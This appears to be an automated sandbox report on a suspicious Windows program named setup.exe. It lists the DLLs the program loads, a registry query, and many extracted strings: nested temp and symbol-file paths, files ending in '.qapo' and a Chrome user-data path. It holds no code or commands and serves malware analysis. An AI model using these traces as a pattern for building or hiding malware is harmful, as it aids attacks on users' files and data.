        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: aclayers.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: setup.exe, 00000007.00000003.2625881641.000000000359D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2626017307.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2461993302.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qapo source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\3.exeN source: setup.exe, 00000007.00000003.2627156422.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: setup.exe, 00000007.00000003.2626159468.000000000319B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684914442.000000000319B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\a\ source: setup.exe, 00000007.00000003.2461993302.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: setup.exe, 00000007.00000003.2768965443.000000000398D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768366694.000000000396F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2764644897.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764499764.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742757792.0000000003A0F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\.pdb^ source: setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742307025.0000000003749000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\EU,n source: setup.exe, 00000007.00000003.2743065329.000000000358D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: setup.exe, 00000007.00000003.2710455878.0000000003948000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724383296.0000000003969000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724018230.0000000003950000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723254796.0000000003949000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774492589.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774727040.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\j source: setup.exe, 00000007.00000003.2724383296.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742372787.00000000039AC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723254796.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2743615497.00000000039B5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*ory\^ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C source: setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713175498.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724534584.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: setup.exe, 00000007.00000003.2710037424.0000000003620000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723471760.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713324414.000000000365F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710681937.0000000003642000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2685656337.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625881641.000000000359D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685189720.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686393680.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: setup.exe, 00000007.00000003.2785158322.0000000003AEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\a0\\, source: setup.exe, 00000007.00000003.2785654234.00000000035C2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\# source: setup.exe, 00000007.00000003.2773242341.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2772716906.00000000039EC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Se:O source: setup.exe, 00000007.00000003.2779194875.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779024019.0000000003ABF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\* source: setup.exe, 00000007.00000003.2785158322.0000000003AEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\eSync\ source: setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774492589.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774727040.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2768838437.0000000003A6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768648555.0000000003A55000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qapo source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684849989.0000000003640000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2686703862.0000000003182000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685008804.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684970587.0000000003177000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713267355.0000000003184000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2712424638.000000000316F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2711719225.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710870216.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2711232691.00000000035E2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\= source: setup.exe, 00000007.00000003.2768838437.0000000003A6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768648555.0000000003A55000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\\ source: setup.exe, 00000007.00000003.2772716906.00000000038F9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773658028.0000000003938000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768366694.000000000396F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773794657.0000000003985000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\? source: setup.exe, 00000007.00000003.2743511663.0000000003763000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742307025.0000000003749000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s\ source: setup.exe, 00000007.00000003.2764644897.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764499764.00000000039D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: setup.exe, 00000007.00000003.2684970587.0000000003177000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686044253.0000000003192000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2626657794.0000000003180000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\AC\ source: setup.exe, 00000007.00000003.2713457937.000000000316A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2627156422.0000000003167000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686510863.0000000003168000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685316108.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ts\ source: setup.exe, 00000007.00000003.2779194875.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779024019.0000000003ABF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\6 source: setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\4 source: setup.exe, 00000007.00000003.2712522294.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713919458.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723719415.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: setup.exe, 00000007.00000003.2713731803.0000000003911000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713597685.0000000003900000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e source: setup.exe, 00000007.00000003.2782379959.0000000003A86000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\$ source: setup.exe, 00000007.00000003.2685562013.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685409736.00000000036D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: setup.exe, 00000007.00000003.2743351263.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2433244594.00000000035BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2432071490.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2433575284.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2433415636.00000000035C2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713823244.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2712968549.00000000035EA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724488182.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723856155.00000000035EA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723661326.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710870216.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2711232691.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\yewy\ source: setup.exe, 00000007.00000003.2785762338.0000000003665000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1 source: setup.exe, 00000007.00000003.2685562013.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685409736.00000000036D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\BH source: setup.exe, 00000007.00000003.2764644897.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764499764.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742757792.0000000003A0F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2724383296.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742372787.00000000039AC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723254796.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2743615497.00000000039B5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: setup.exe, 00000007.00000003.2627156422.0000000003167000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2411613102.0000000003167000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686510863.0000000003168000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685316108.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\te\* source: setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: setup.exe, 00000007.00000003.2685656337.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625881641.000000000359D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685189720.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686393680.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\.pdb\kSf6 source: setup.exe, 00000007.00000003.2772716906.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773020133.00000000039FD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\] source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qapoqapoS source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbPd source: setup.exe, 00000007.00000003.2685008804.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2626958901.00000000035EA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685528048.0000000003620000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\kies\ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\* source: setup.exe, 00000007.00000003.2782580351.0000000003967000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qapo% source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
